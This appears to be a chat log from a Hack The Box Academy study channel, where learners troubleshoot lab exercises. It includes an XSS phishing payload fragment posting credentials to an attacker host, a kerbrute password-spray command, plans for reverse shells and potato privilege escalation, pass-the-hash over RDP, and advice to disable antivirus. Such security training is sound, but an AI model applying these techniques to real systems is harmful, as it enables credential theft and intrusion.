But it is a step between people just asking for videos

@pale stirrup in your linux machine, what is the md5sum of the upload_win.zip

Also the upload_win.txt that exists already on the desktop is NOT gonna give you the right hash

thank you

@ocean night ur a top G

Turned out it was an outage with FontAwesome

It resolved minutes after I upgraded our plan

||2EDF25B27B268445694276C20D55449E|| is the md5sum of the zip file (casing doesn't matter, you can check this with Get-FileHash <filepath> -Algorithm md5) @pale stirrup

"Give us more money"

If you wanna dm me about it feel free @pale stirrup but I can confirm that uploading, unzipping and getting the filehash with hasher does work and give the intended answer

what something new on academy ?

The only way to obtain a 'valid' hash is by using the hasher application on the target machine. That's what confused me initially. Attempting to hash the upload_win.txt file with a command such as 'Get-FileHash PATH\upload_win.txt -Algorithm md5' will produce a different output.

Annual sub holders have a "show step-by-step walk through" option

what that's mean they got walkthroughs ?

Basically, yeah

weird

walkthroughs for what though? the skill assessments?

the modules themselves are walkthroughs heh

Everything

Just took a look at the guide for ad enum and attack skill assessment 2, as I'm looking to provide accurate and thorough feedback on it

why not working my command?

where is the guide located?

If you're subscribed to the annual, there is a link for each assessment question.

Not for the exams of course though 😅

e.g.

If you're subbed, you need to enable the option in your settings (https://academy.hackthebox.com/settings)

can powerview.ps1 only export csv?

Im doing the Attacking Common Applications attacking splunk, i dont understand how the payload they gave us for powershell we have to name it run.ps1 and itll run and give us rev shell but if we name it something else like shell.ps1 it wont run it

because linked names and such

so then i have to name it run.ps1 everytime if i want to run it

hello guys,

I get this error while installing the dll file

pivot module - RDP and SOCKS Tunneling with SocksOverRDP

Disable real-time protection

Damn so basically when u purchase a module u haven’t purchased it 100% 😄

Anybody have a workaround for the issue with the XSS Phishing section?

The >!-- does not work

Just shows part of the payload

I posted in erratum but I was wondering if anyone has a workaround for now until it's fixed

I think the instance I have is bugged, but I am not able to get a new ip. Every time I try to refresh the ip it gives the same one.

just modify the code a bit

look the source and look at your payload, i was able to make it look nice

Was about to say the same, you beat me to it

I used the exact code that the module showed.

Doesn't work

Hence why they said modify it a bit

Find what element you need to change

yeah but the section shows you how you can look at the source and fix it if you want, i don't think it's required to complete the question

Modify what part?

the section teaches you this, you look at the source, the tags, the elements, etc, and then you can modify your payload and tweak it to the page

I checked all that and it matched up with the code that was given in the module.

well there's your problem

the section provides an example, if you want to clean it up you have to know the material and adjust it to match the assessment part

copying the code there isn't going to work

Yeah I just don't know what to change. The page source matches up with what was in the module.

I'm terms of the payload

Have another look through the Reflected XSS module - while you are indeed using the payload stated in the module, there's a bit more you need to do in order to achieve the end goal

Checking the dev console on the browser might also hint as to what the problem is 🙂

look at the characters that display that you don't want to see, then look at your code or the source code to see where the characters are that are causing it. if it's before the username/password fields then look before that code. if it's after, then look after that code. if you find something you think may be it, you can remove it and test it. you can also add junk characters to get an idea of where things are being inserted.

I got rid of the special characters, but the removal of the url box is not working

I'd recommend reading over the section that goes over this again, you're going to need to look for an ElementID that you can remove

targets been spawning for over 10 mins, is it normal?

I'm also having issues spawning, USW

This is what I'm getting

USE and EU1,EU2 for me too lol

What is the issue?

Targeting is spawning...

jfc, killing my study time with this

make it a script

also minor spoiler :^)

nah i just messed with it

gotta make it into a js

It's a url form

Lame advice, but have you refreshed the page? While it should trigger with an event to update the UI, I've seen it not do so sometimes

What do you mean by make it a script?

It's definitely the servers

did that a few times, no success 🙂

it means make it into a script element

it's fairly easy

Na a refresh just reset it. Gonna click it again. Maybe third time is the charm

my server came up now

What would that look like? I don't see that anywhere in the section.

and it worked

look at the start where it tries to have you get an alert

just throw that around your payload (and close out the previous html tag before it)

Where is this covered? One of the previous sections?

is this the XSS module?

Yeah

for this section

the phishing section

yeah, you should probably, y'know.. turn it into a script

XSS --> Cross Site Scripting

it's kinda IN THE NAME

Using the script gave me this

Now my password and username field are gone

well you likely put them in the wrong spot then

This is what I got

it worked fine for me ¯_(ツ)_/¯

That same script?!

sec

also you don't need the index.php but i believe that's a non-issue

uh is there an error in that payload

i can't tell

...h3><form action=http://myvmip>/<input...

nah

that's not where it is

the document.write isn't closed

it's missing a closing ')

ok i guess it just looks weird

i started with '<h3> and then just put the <script> to remove the element at the end

look before the document.getElementByID, you need to close the document.write() before the ;

you can wrap the whole payload in <script>

idk, i didn't do it that way

i'm just saying that is a way you can do it

i customized the payload off the source code of the page

:) ik because that's literally what I did

oh yeah i'm sure you can

That gave me this

brother

you really need to go over the section again

I have multiple times

</form>; this is where your error is

analyze the source code of the page, customize the payload off the source code

look at the tags, what's being closed, etc

you still didn't close the quote

I don't get why this isn't working, the rest of my payloads were working

Which quote?

you have a quote before '<h3>

Ok.. love that you want to keep trying to help Marcie, but could you take it to DM if you want to continue please

so you need to close it with one

Literally walking through a T2 module section here 😅

that's fair

it's also basic troubleshooting and scanning for errors

Oh, got it

I saw an open (' and no closing ')

I must have taken that out in a previous step

takes 5 seconds to scan for it

I was getting a
')
before so I took that out

:P

which is where it broke because it took everything with the first ; onward as still part of the first document function

How did you do it without <script>?

it says right there that they used <script>

they put it in a different spot

becuase if you look at the source it doesn't need it, you can just use the existing code and put the script at the end to remove the elementid

there are multiple ways to do it

What would that look like?

i mentioned it earlier, but my payload just started with '<h3> and ended with </form> and then i did the elementid removal with <script> at the end

ohhhh i see what you're saying

What about the document.write(
??

because of where it's injected

right

that's the element removal part at the end

ahhh i just did what you are suggesting, IMO looks a lot nicer

Good insight

now i'm curious what yours looks like lol i thought the end result was the same

dm

it looks similar

like SLIGHT difference

Do you guys mind sending me your payloads in a dm so I can see?

I finally got it but I want to see how you both did it too if you don't mind please

imo i just looked at the page source to see what was being referenced

look at the page source where the payload is

then play around with it

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
AD Skill Assessment 2.

I can't seem to get interactive shell on the SQL01. I found the password from the file in the previous question, I suppose it's linked the the mssqlsvc account.

I used sqsh, but it doesn't work. I tried PowerUpSQL but it has no connection.
Any ideas?

The way in which I'm using what I learned in Password Attacks in Attacking Common Services is seriously epic. This is a very smart way to have these modules stack on one another.

wrap the pw in single quotes

oh wait you might need to do more enum

sniff snaff around for it

FYI, the Academy dept are updating the Introduction to Shell section to add some extra info around special characters following the case the other day 😉

awesome!

the file should also have the user

There was a very small mention to escape in there, but yeah, definitely needed some more info

is the windows vm in common services supposed to be this slow?

5 mins to show the desktop via rdp

That doesn't sound right.. what's your latency to the VPN you're connected to looking like?

sounds like potential connection issues

damn

if you ping the target IP what's the avg ping ping -c 5 $IP

the latency to the EU vpns has been pretty bad the past few weeks

If ping shows an ok response time but high packet loss, switch out to TCP connection pack instead

I had to switch to US vpn

switched to US

yea but that's 350 ping

target is up btw^

https://status.hackthebox.com/incidents/f2c5871f-f546-461d-aa82-9d3bc75e752a

on the academy page

damn daniel

change vpn regions and respawn the target

ok

also use the TCP download

100% loss seems very off.. there were issues, and AFAIK were resolved, but if the incident is still up on the status page either someone forgot to take it down, or the issues has reoccurred

Have you switched already @ebon minnow ?

yep

Ok, nevermind then, wanted to have a poke about

Hope you have better luck on the different VPN

yeah its faster, still a slideshow but much better than last time 😄

I'm unsure if this is the right place for the following message but I'm just curious and wondering if subcribing for the hackthebox academy would actually give me access to the labs too

Ooo, so I ain't got all the info yet, understood. I thought that one of the accounts I found mssqlsvc might be for it, but sure. I will sniff a bit more.

Ty for the update.

?

What do you mean the file has the user..

the password is right; and the question tells you it's in a connection string

Ohhh the ...got it

n*:password

(i know it's not given in that exact way)

Doesn't matter, I should've been able to see it.

it happens

you were looking for the standard service account

Found it.

Ty a lot again.

np

goes to show you; never make assumptions

I will probs be back if I don't get further but I will read around.

I was a bit desparate.

Now, let's try.

Worked!! We got the mssql shell.

HTB Labs and HTB Academy are two separate platforms and subscriptions for now

im stuck at (server side attacks --> Blind SSRF Exploitation Example) i dont think i understand the (We should be thorough during penetration tests and look for the blind counterparts of different vulnerability classes) part i tried everything that came to my mind and still it didnt work im glag for any help

Subscription to one does not grant a subscription to the other

would be a nice boon for annual since SSO is almost in full swing

Was that a question?

just a suggestion :)

at least for Gold Annual

Marcie

I need me a tip. See I got the shell, I can do stuff with xp_cmshell.

Problem being that when I try to extract the flag, it says I have no perms.

I suppose there's gotta be a password or something in those DBs.

2 of them are empty as hell, 4th is full of b4lls and the first, I haven't found anything, I will search again.

Now I can try to upload a reverse shell to the C: Of sql 1 and open it from the xp_cmd shell.

Which can give me some sort of access, but I still don't have the rights for the administrator.

spoofing is interesting

or even potatoes

Wasn't that man in the middle.

I see where this is going.

Juicy potatoes...

SeImpersonate privs

there's a handful of exploits that relate

Gonna get to it, then.

🫡

Why is it sometimes that HTB just loves giving teasers for the next module. Skill assessment 1 was proxies. Now privilege escalation.

Need some help on Predictable Token Reset - Question 1. Are we supposed to iterate thru the milliseconds? I attempted to brute force with increment of 1000 (1s) but couldn't get it

everything you need to do has been covered by the module

it's +/- 1s UTC

bruh fr fr im on
Active Directory Enumeration & Attacks

Page 11
Internal Password Spraying - from Linux

Internal Password Spraying - from Linux i made list

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 user.txt Welcome1
j
and it dont work why

52 usernames i tried mlowe@inlanefreight.local and the nagain with mlowe

wait a bit or reset the lab, kerberos didn't start properly

Module: Attacking Common Services
Section: RDP

Question: Connect via RDP with the Administrator account and submit the flag.txt as you answer.

Issue: I disabled the reg key and have the correct hash, connecting with admin creds using PTH isnt working for some reason

@swift grail I don't respond to unsolicited DMs. Can you ask your question here please?

On HTTP Attacks skills assessment, can someone confirm for me (perhaps via DM if it's spoilers) that the smuggled request's response is supposed to appear nested within the initial request's response?
Does that mean I'm doing something wrong?

Edit: The response should appear in the second Burp tab.

Make sure you spray with usernames.

Not emails.

Also kerbrute sometimes plays a bit.

Try some other tools.

Hey, saw you ask about common services earlier in January. Specifically the last question about RDP section. Do you happen to know any tips?

Yeah it bugged out like crazy.

It should work once you disable the stuff.

With the reg add hklm or whatever it was.

Damn

I had to reset lab 6 times.

Second time resetting and disabling, I’ll try a couple more times then lol

Get into DMs rq

Oh snap lol

Hi, it's not supposed to be nested, no 😄 But if you can see the smuggled response then you should be able to solve the lab regardless 🙂 If you want me to look into it feel free to DM me with the requests you are sending

Hi, I am doing the YARA & Sigma for SOC Analysts module and I am stuck on "Developing YARA Rules". The question im stuck on:
Perform string analysis on the "DirectX.dll" sample that resides in the "/home/htb-student/Samples/YARASigma" directory of this section's target. Then, study the "apt_apt17_mal_sep17_1.yar" YARA rule that resides in the "/home/htb-student/Rules/yara" directory and replace "X.dll" with the correct DLL name to ensure the rule will identify "DirectX.dll". Enter the correct DLL name as your answer. Answer format: _.dll
I went into the Rule "apt_apt17_mal_sep17_1.yar" and switched it out. But how do I run it after i changed it? I cant find it anywhere, what am I supposed to do after I change it to get the DLL name?

You may have misunderstood the question. The goal is not to replace "X.dll" with "DirectX.dll" (as I understand, this is what you did). What you should is perform string analysis on DirectX.dll and change "X.dll" such that running the rule on DirectX.dll would yield a hit. The section provides examples on how to perform string analysis on binaries. You do not need to run the rule to answer this question, but you can do so to verify you got the correct answer.

As for how to run Yara rules, you can just read the next section of the module, i.e. Hunting Evil with YARA (Windows Edition) Subsection Hunting for Malicious Executables on Disk with YARA

I'm the only one who can't do anything on the module because my VPN connection crash after 60 seconde every time ?

Does the VPN connection itself disconnect, or the connection to the target machine? Did you try a different Server and/or TCP instead of UDP?

hello everyone, can someone tell you how to complete the task - https://academy.hackthebox.com/module/80/section/779

if possible, I will write messages in private messages

hi

has anyone had issues installing oracle database attacking tool in the section oracle tns in the module footprinting?

Specifically i have issues pip installing pycrypto library

instead of pycripto install pycryptodome

thank you

hello guys, in smtp user enumeration. In the web services enumeration module it doesnt instruct us to add the -D flag while in the attacking web services module it does. What exactly is the difference between querying a full email address and quering a single username... does each case have a specific use ?

what are u using to do the user enumeration

and which script/executable are you meaning for the -D flag

How long did you wait to perform a full port scan? It's taking too long for me...

Stuck at decoding the cookie for 'Skills Assessment - Broken Authentication'. Any tips? Try many combination in CyberChef with no luck

#welcome

I'm stuck at the module of FOOTPRINTING - DNS enumeration, the last question is about the FQDN of the host with the last octet finishing with .203
Can someone help me understand how can i solve this?

I turned off all of them for security reasons but it still didn't work.

did you figure this one out?

yes

can I dm?

++++++++

Hi guys, how much time should i spend to bruteforce password in this module ? https://academy.hackthebox.com/module/147/section/1391 I created wordlist using materials in resources section. And my tools tell me that it would take 9-14 hours

9 to 14 hours is without a doubt way too long. Check the cheat sheet for the right wordlist

I used both wordlists (passwords and rules) from "resouses"

test

odat.py is able to bruteforce user accounts on an oracle db

it seems to use it's own userlist files

can we provide it a user list?

How can I install regsvr32.exe bcs this command not working regsvr32.exe SocksOverRDP-Plugin.dll